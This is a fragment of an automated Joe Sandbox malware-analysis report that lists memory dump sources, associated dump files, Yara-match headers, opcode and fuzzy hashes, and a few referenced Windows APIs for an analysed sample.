                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: 8eee54fcd45f5061d97243a059da65366a282f927da272e49259865ee55b0b4b
                                                                                                                                                                                                                                                              • Instruction ID: 2d8d5a59ffd3e1fb345182a921a53bd4656d967e9db3367e54317ca57dd61c38
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8eee54fcd45f5061d97243a059da65366a282f927da272e49259865ee55b0b4b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72C08C381112006BEA2C4A384184E343285DA4372C3F00BDDE0B14B1F1EF32DC03C6A0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BCB3C8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                                              • Opcode ID: 093886f571957d7726ad70644679f6275a5e8accff5e441551de639b1b77cded
                                                                                                                                                                                                                                                              • Instruction ID: 69d80fa074cb8d94a781938ac56ef774d2ab3ec1fcb2039f5b1a7a1216731f08
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 093886f571957d7726ad70644679f6275a5e8accff5e441551de639b1b77cded
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36B10670A10268DFEB29CF18C895BDEB7B5EF15304F5085DDE809A7281D775AA88CF90
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a6d638e01e9d957fcb665eec8e1ac98c7fadb918ef865c217d0df8974bd070c0
                                                                                                                                                                                                                                                              • Instruction ID: 8d5744d8fdd82d6d2ada071094379e43c9630a2d48900d6ebe1daddcc3040437
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6d638e01e9d957fcb665eec8e1ac98c7fadb918ef865c217d0df8974bd070c0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF1106EB2082607D794295597F21AFB67EFD1C1B30334CC37F823C6902E2A42D4A6471
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b7e65f92ce772d542fb5fa85eba488470d12c98c87aebd29c7c259ea8bd952f9
                                                                                                                                                                                                                                                              • Instruction ID: da8ab6709c1aa92ac3bd19c87112be479f3797fa8ed2d01bb0887a317d1a6ece
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7e65f92ce772d542fb5fa85eba488470d12c98c87aebd29c7c259ea8bd952f9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 751106EB1083206EBA42A5696A55AF777EFE5C1B30334CC36F817C6506E6A83C899471
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 60ade291c8898b553486709522d094616611a3879e4e7418716aebf5a1b099b4
                                                                                                                                                                                                                                                              • Instruction ID: 8d12eee939e949132bee0f5309c8a9a270ec564771d3ff14b590b4ea7ba58a32
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60ade291c8898b553486709522d094616611a3879e4e7418716aebf5a1b099b4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 520147EB1087206E7A0265696A55BFB7BDFD5C1B30334CD36F427C7902A2A83D4D54B2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d4f4b2556bc3940f2eed38620a53f882d15e067d3a919b374a258a921822c397
                                                                                                                                                                                                                                                              • Instruction ID: afb40381396eefb74662d8bea48fccb60a203abf4057f5088b7e2ddcb4466675
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4f4b2556bc3940f2eed38620a53f882d15e067d3a919b374a258a921822c397
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A60147EB1083207DB90255596A55AFB77DFD5D1B34338CD32F423C7902E6A83C4954B2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 98c5d309e4ad4770c38ba7e5fa40849f89394d8f390657ff692f4dc1647beca2
                                                                                                                                                                                                                                                              • Instruction ID: a4999ab28cafcd6172b692d429c290d0aa17942feef1cdcbbe076ec85e50c0ab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98c5d309e4ad4770c38ba7e5fa40849f89394d8f390657ff692f4dc1647beca2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B0147EB1083146E2902D86996456F73BDFD5C2630334CD3AE423CA411E2603C065061
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b094d3544eac063b0779f0b4874a0691d633eab0f7fd5ef373e56c6ee1f55ada
                                                                                                                                                                                                                                                              • Instruction ID: 4a2288591c10ab37c4cab3cd15971b501b502cbaac460712952d8659052ddcaa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b094d3544eac063b0779f0b4874a0691d633eab0f7fd5ef373e56c6ee1f55ada
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F0A3D35083918F8F431A6D84C16B13FE66A132243288CF5D0F38F111D2243C06CF56
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                              • Opcode ID: be2333d8c178bbe30e4ab3cf7fd780e3a7230c7df50107b1e8bd4b9393c6ce2f
                                                                                                                                                                                                                                                              • Instruction ID: 88bc360bb93519951d35f6295cb56efc02afe9ef310b5dd85b21355d1c88b025
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be2333d8c178bbe30e4ab3cf7fd780e3a7230c7df50107b1e8bd4b9393c6ce2f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAC239B1E046688FDB25CE28DD407AAB7B9EB48304F1441EAD95DE7280E775AF85CF40
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 00BCE10B
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000008,00000000), ref: 00BCE140
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
